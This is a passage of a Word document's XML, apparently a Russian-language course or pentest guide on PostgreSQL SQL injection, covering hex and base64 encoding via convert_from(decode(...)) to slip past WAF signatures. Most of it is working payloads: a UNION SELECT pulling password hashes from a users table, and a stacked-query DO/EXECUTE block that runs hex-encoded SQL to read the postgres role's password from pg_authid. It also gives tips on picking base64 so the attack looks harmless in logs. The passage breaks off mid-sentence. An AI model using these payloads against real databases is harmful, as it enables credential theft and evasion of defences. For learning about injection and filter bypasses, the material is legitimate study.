        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — hex/octal encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E9F988" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — E-string escape bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4816B8F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CVE-2006-2313 — historical context: standard_conforming_strings introduced as security mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC1A38F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.9.5 convert_from(decode(...)) — hex/base64-encoded строки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AC6CA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED13C5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Из WAF 3.9.0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0521F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b(dblink|pg_read|pg_authid|...)\w*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — подстрока имени; кодируется в hex/base64 целиком.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF3B479" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Дополнительные классы фильтров, которые сильнее 3.9.2/3.9.3/3.9.4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F8051" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF с детектором длинных chr-цепочек</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(N)||chr(N)||...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> распознаётся (сигнатура CRS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>942100</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); один </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode('70675f...', 'hex')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA6EA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF с детектором escape-литералов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функционально похожи на текстовую конвертацию, в большинстве WAF не флагуются (часто используются легитимно для UTF-8 normalisation, base64-encoded payload-ов в API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A03E498" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sanitizer, удаляющий backslash и/или E-prefix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode('hex')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не использует backslash; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from</w:t>
      </w:r>
      <w:r>
        <w:t>-вызов выглядит как обычная UTF-8-функция.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626572A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Принципиальное ограничение то же, что у 3.9.2/3.9.3/3.9.4: даёт строковое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>значение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не SQL-токен. Для имени функции/таблицы — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в DO-блоке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EC9642" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Компактность по сравнению с другими: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5684"/>
        <w:gridCol w:w="1806"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="49A9FAE3"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74D4C26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Приём</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B6F3667" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Запись `'pg_authid'` (9 символов)</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486FD24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Длина</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2594D5CA"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0AA1C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>chr (3.9.2)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ECCB19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>`chr(112)\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385153" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7757AAB8"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DA6ACB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Unicode (3.9.3)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3FC15E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>U&amp;'\0070\0067\005F\0061\0075\0074\0068\0069\0064'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EA01E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="76B462D5"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3D50B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>E-string hex (3.9.4)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4DC69B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>E'\x70\x67\x5F\x61\x75\x74\x68\x69\x64'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C91196" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2B95B8D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408031" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>decode hex (3.9.5)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82971E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>convert_from(decode('70675f617574686964','hex'),'UTF8')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EC2009" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7BDF0DAF"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E1282D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>decode base64 (3.9.5)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CEFF2E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>convert_from(decode('cGdfYXV0aGlk','base64'),'UTF8')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06C14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="371CEB49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для коротких строк выигрыш у E-strings; для длинных (≥ 30 символов) — у decode-форм, потому что нет повторяющихся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\0</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U+</w:t>
      </w:r>
      <w:r>
        <w:t>-префиксов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7B1AF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — hex-decoded для содержимого литерала</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC698EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст — фильтр блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@'</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E58741" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15828349"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convert_from(decode('61646D696E40636F2E636F6D', 'hex'), 'UTF8') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF3439D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7175AB6F"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4A3EB384"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6279A1E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F44D150" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE email = convert_from(decode('61646D696E40636F2E636F6D', 'hex'), 'UTF8') --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1EE552" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode('61646D696E40636F2E636F6D', 'hex')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bytea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> со значением байтов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x61 0x64 0x6D 0x69 0x6E 0x40 0x63 0x6F 0x2E 0x63 0x6F 0x6D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from(..., 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> интерпретирует эти байты как UTF-8 и возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@co.com'</w:t>
      </w:r>
      <w:r>
        <w:t>. WAF в payload-тексте подстроки нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42504CFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для генерации hex на стороне атакующего: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>echo -n 'admin@co.com' | xxd -p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@co.com'.encode('utf-8').hex()</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA6435B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — base64-decoded (когда hex заметнее в логах)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E72AB71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Логи приложения часто включают request-параметры; длинная hex-строка визуально подозрительна. Base64 выглядит «безобиднее» и при разборе вручную часто скипается (привычка: «base64 — обычное кодирование данных»).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6027B610" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E805D80"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email = convert_from(decode('YWRtaW5AY28uY29t', 'base64'), 'UTF8') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8FE199" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CE8C37"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'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E5E775" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT id, email, password_hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED464D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAEC6CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE email = convert_from(decode('YWRtaW5AY28uY29t', 'base64'), 'UTF8') --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D5D40" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Семантика идентична Payload A. Генерация base64: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>echo -n 'admin@co.com' | base64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>base64.b64encode(b'admin@co.com').decode()</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF0B56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — decode + EXECUTE для имени функции/каталога</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5322A6BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Полный аналог Payload B из 3.9.2 (chr-вариант), но компактнее. Контекст — payload в точке инъекции, допускающей stacked queries или DO-блок:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73630828" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1; DO $do$ BEGIN EXECUTE convert_from(decode('53454C4543542072 6F6C70617373776F72642046524F4D2070675F61757468696420574845524520726F6C6E616D653D27706F73746772657327', 'hex'), 'UTF8'); END $do$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393CD786" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>(пробел в hex для читаемости; на самом деле строка идёт сплошняком, см. ниже)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E250638" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hex-строка — это: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
